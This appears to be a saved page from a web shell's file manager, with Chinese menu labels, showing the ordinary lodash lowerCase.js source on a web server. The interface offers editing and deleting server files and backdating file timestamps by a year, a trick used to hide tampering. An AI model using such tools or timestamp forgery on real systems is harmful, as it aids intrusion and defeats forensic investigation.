文件操作 - lowerCase.js
返回文件管理
返回主菜单
删除本文件
文件: /var/www/OLD/node_modules/lodash/lowerCase.js
编辑文件内容
var createCompounder = require('./_createCompounder'); /** * Converts `string`, as space separated words, to lower case. * * @static * @memberOf _ * @since 4.0.0 * @category String * @param {string} [string=''] The string to convert. * @returns {string} Returns the lower cased string. * @example * * _.lowerCase('--Foo-Bar--'); * // => 'foo bar' * * _.lowerCase('fooBar'); * // => 'foo bar' * * _.lowerCase('__FOO_BAR__'); * // => 'foo bar' */ var lowerCase = createCompounder(function(result, word, index) { return result + (index ? ' ' : '') + word.toLowerCase(); }); module.exports = lowerCase;
修改文件时间
将文件时间修改为当前时间的前一年
删除文件